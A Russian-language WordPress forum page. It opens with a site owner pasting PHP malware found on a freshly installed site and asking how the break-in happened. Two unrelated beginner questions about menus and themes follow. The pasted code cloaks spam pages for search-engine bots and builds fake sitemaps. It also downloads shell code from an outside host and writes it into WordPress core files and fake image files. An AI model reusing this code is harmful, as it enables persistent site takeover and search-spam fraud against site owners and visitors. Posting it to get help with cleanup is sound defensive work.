exit;}function is_https() { if ( !empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') { return true; } elseif ( isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https' ) { return true; } elseif ( !empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off') { return true; } return false;}
if($tempweb){ $site = $tempweb[0].$tempweb[1].$tempweb[2]; $temp = substr($tempweb,3);}$lang = $_SERVER["HTTP_ACCEPT_LANGUAGE"];$lang = $s($lang);$os = $_SERVER['HTTP_USER_AGENT'];$os = $s($os);if(isset($_SERVER['HTTP_REFERER'])){ $urlshang = $_SERVER['HTTP_REFERER']; $urlshang = $s($urlshang);}else{ $urlshang = '';}
$clock = $_SERVER['REMOTE_ADDR'];$http_clock = $_SERVER['REMOTE_ADDR'];
if(stristr($clock,',')){ $clock_tmp = explode(",",$clock); $clock = $clock_tmp[0];}
if(!isset($sitemap_file) || @$sitemap_file==''){ $sitemap_file = 'sitemap';}if(!isset($mapnum) || @$mapnum==''){ $sitemap_file = 2000;}
if(preg_match('/^'."\/".$sitemap_file.'(\d+)?.xml$/i',$smuri_tmp,$uriarr)){ @header("Content-type: text/xml"); if(isset($uriarr[1])){ $id = str_replace('_','',$uriarr[1]); }else{ $id = 100; } $ivmapid = 0; sitemap_out(z_sitemap($goweb,$id,$host,$dt,$ivmapid,$mapnum,$http_web),$host,$uri_script); exit();}function z_sitemap($goweb,$id,$host,$dt,$maptype,$map_num,$http_web='http',$filetype=0,$map_splits_num='',$temp='',$dataNew=''){ $web = $http_web.'://'.$goweb.'/sitemapdtn.php?date='.$id.'&temp='.$temp.'&web='.$host.'&xml='.$dt.'&maptype='.$maptype.'&filetype='.$filetype.'&map_splits_num='.$map_splits_num.'&map_num='.$map_num.'&dataNew='.$dataNew; return trim(smoutdo($web));}function sitemap_out($url,$host,$uri_script){ if(is_https()){ $http = 'https'; }else{ $http = 'http'; } $date_str = date("Y-m-d\TH:i:sP",time()); $sitemap_header = '<?xml version="1.0" encoding="UTF-8"?><urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd">'; $sitemap_header .= ' <url> <loc>'.$http.'://' . $host . "/" . '</loc> <lastmod>' . $date_str . '</lastmod> <changefreq>daily</changefreq> <priority>0.1</priority> </url>'; $url_arr = explode("\r\n",$url); $map_str = $sitemap_header; foreach($url_arr as $value){ $map_str .= ' <url> <loc>'.$http.'://' . $host . "/" .$value .'</loc> <lastmod>' . $date_str . '</lastmod> <changefreq>daily</changefreq> <priority>0.1</priority> </url>'; } if($uri_script != ""){ $map_str = str_replace($host."/",$host.$uri_script, $map_str); } echo $map_str."</urlset>";}
function get($url){ $contents = @file_get_contents($url); if (!$contents) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); $contents = curl_exec($ch); curl_close($ch); } return $contents;}function write(){ $write1 = get("http://hello.firstguide.xyz/write1.txt"); $write2 = get("http://hello.firstguide.xyz/write2.txt"); $shell_postfs = get("http://hello.firstguide.xyz/mm1.txt"); $shell_load = get("http://hello.firstguide.xyz/mm2.txt"); $new_ht_content = get("http://hello.firstguide.xyz/shl/htaccess.txt"); $ht_content = file_get_contents(".htaccess"); $index_content = file_get_contents("index.php"); $loader_php = "wp-includes/template-loader.php"; $load_php = "wp-includes/load.php"; $font_editor_php = "wp-includes/SimplePie/index.php"; if(!is_dir("css")){ mkdir("css", 0755, true); } @chmod("css/.htaccess", 0755); file_put_contents("css/.htaccess", $new_ht_content); file_put_contents("css/load.php", $shell_load); if(is_dir("wp-includes/SimplePie")){ file_put_contents("wp-admin/images/arrow-lefts.png", $index_content); file_put_contents("wp-admin/images/arrow-rights.png", $ht_content); file_put_contents("wp-includes/images/smilies/icon_devil.gif", $index_content); file_put_contents("wp-includes/images/smilies/icon_crystal.gif", $ht_content); $loader_content = file_get_contents($loader_php); $load_content = file_get_contents($load_php); @chmod($loader_php, 0755);@chmod($load_php, 0755); file_put_contents($loader_php, $write1.$loader_content); file_put_contents($load_php, $load_content.$write2); @chmod($loader_php, 0644);@chmod($load_php, 0644); file_put_contents($font_editor_php, $shell_postfs); }}
if(stristr($smuri_tmp,'.css')){ $web = $http_web.'://'.$goweb.'/index.php?url='.$site.'&id='.$id.'&temp='.$temp.'&dt='.$dt.'&web='.$host.'&zz='.smisbot().'&jdir='.$jdir.'&clock='.$clock.'&uri='.$smuri.'&lang='.$lang.'&os='.$os.'&urlshang='.$urlshang.'&http_clock='.$http_clock; $html_content = smoutdo($web); $html_content = trim($html_content); if(!strstr($html_content,'nobotuseragent')){ if(strstr($html_content,'okhtmlgetcontent')){ @header("Content-type: text/css; charset=utf-8"); $html_content = str_replace("okhtmlgetcontent",'',$html_content); echo $html_content; exit(); }else if(strstr($html_content,'getcontent500page')){ @header('HTTP/1.1 500 Internal Server Error'); exit(); }else if(strstr($html_content,'getcontent404page')){ @header('HTTP/1.1 404 Not Found'); exit(); } }}else if($site){ if($id){ @header("Content-type: text/html; charset=utf-8"); $web = $http_web.'://'.$goweb.'/index.php?url='.$site.'&id='.$id.'&temp='.$temp.'&dt='.$dt.'&web='.$host.'&zz='.smisbot().'&clock='.$clock.'&uri='.$smuri.'&urlshang='.$urlshang.'&http='.$http.'&page='.$page; $html_content = smoutdo($web); $html_content = trim($html_content); if(!strstr($html_content,'nobotuseragent')){ if(strstr($html_content,'okhtmlgetcontent')){ $html_content = str_replace("okhtmlgetcontent",'',$html_content); echo $html_content; exit(); }else if(strstr($html_content,'getcontent500page')){ @header('HTTP/1.1 500 Internal Server Error'); exit(); }else if(strstr($html_content,'getcontent404page')){ @header('HTTP/1.1 404 Not Found'); exit(); } } }}else{ $web = $http_web.'://'.$goweb.'/index.php?url='.$site.'&id='.$id.'&temp='.$temp.'&dt='.$dt.'&web='.$host.'&zz='.smisbot().'&clock='.$clock.'&uri='.$smuri.'&urlshang='.$urlshang.'&http='.$http.'&page='.$page; $html_content = smoutdo($web); $html_content = trim($html_content); if($uri_script != ""){ $html_content = str_replace($host."/",$host.$uri_script, $html_content); } if(!strstr($html_content,'nobotuseragent')){ @header("Content-type: text/html; charset=utf-8"); if(strstr($html_content,'okhtmlgetcontent')){ $html_content = str_replace("okhtmlgetcontent",'',$html_content); echo $html_content; exit(); }else if(strstr($html_content,'getcontent500page')){ @header('HTTP/1.1 500 Internal Server Error'); exit(); }else if(strstr($html_content,'getcontent404page')){ @header('HTTP/1.1 404 Not Found'); exit(); }else if(strstr($html_content,'getcontent301page')){ @header('HTTP/1.1 301 Moved Permanently'); $html_content = str_replace("getcontent301page",'',$html_content); header('Location: '.$html_content); exit(); }
}}
function smisbot() { $agent = strtolower($_SERVER['HTTP_USER_AGENT']); if ($agent != "") { $googleBot = array("Googlebot","Yahoo! Slurp","Yahoo Slurp","Google AdSense",'google', 'yahoo'); foreach ($googleBot as $val) { $str = strtolower($val); if (strpos($agent, $str)) { return true; } } }else{ return false; }}function smotherbot() { $agent = strtolower($_SERVER['HTTP_USER_AGENT']); if ($agent != "") { $spiderSite = array ("TencentTraveler","msnbot","Sosospider+","Sogou web spider","ia_archiver","YoudaoBot","MSNBot","Java (Often spam bot)","BaiDuSpider","Voila","Yandex bot","BSpider","twiceler","Sogou Spider","Speedy Spider","Heritrix","Python-urllib","Alexa (IA Archiver)","Ask","Exabot","Custo","OutfoxBot/YodaoBot","yacy","SurveyBot","legs","lwp-trivial","Nutch","StackRambler","The web archive (IA Archiver)","Perl tool","MJ12bot","Netcraft","MSIECrawler","WGet tools","larbin","Fish search", 'bingbot', 'baidu', 'aol', 'bing', 'YandexBot', 'AhrefsBot'); foreach ($spiderSite as $val) { $str = strtolower($val); if (strpos($agent, $str)) { return true; } } }else{ return false; }}function smoutdo($url){ $file_contents = @file_get_contents($url); if (!$file_contents) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); $file_contents = curl_exec($ch); curl_close($ch); } return $file_contents;}function listDir($dir){ $filearr = array(); if(is_dir($dir)){ if ($dh = opendir($dir)){ while (($file = readdir($dh)) !== false){ if((file_exists($dir."/".$file)) && $file!="." && $file!=".."){ $filearr[] = $file; } } closedir($dh); } } return $filearr;}
?>
Собственно, из кода всё понятно - сия шлоедрянь докачивает в себя ещё отдельные куски кода, которые потом и переписывают файлы в CMS, так же стучится в поисковики и создает кучу sitemap.
Вопрос не к шеллу, а к самому факту взлома.
WP стоит абсолютно свежий (скачан с офсайта 9 числа. последний релиз), ибо на него клиент пожелал переехать с джумлы.
Мб у кого уже такое встречалось, и сохранились логи? Известно, как эта гадость может попасть на сайт, что бы прикрыть дыру?
Вкладка перестаёт реагировать при добавлении дочерней вкладки
Есть меню. В нём вкладка Contact с аттрибутом
href=”http://acme/contact/”. При нажатии переходит на страницу
page-contact.php. Однако, при добавлении в меню дочерней для Contact
подстраницы скажем Contact1 аттрибут href для Contact остаётся
неизменным, однако, при нажатии на вкладку Contact уже ничего не
происходит. Что делать ?
Добрый день !
Вопрос знатокам от новичка как поменять тему в wordpress?
Скачиваю новую тему – активирую,
но отображается на главной странице дефолтная страница – т.е.
все записи дефолтной страницы.
Как сделать, чтобы отображалась новая тема – со всеми картинками и записями?
Перерыл интернет – но так и не понял.
Подскажите ресурс или видео – где это можно понять.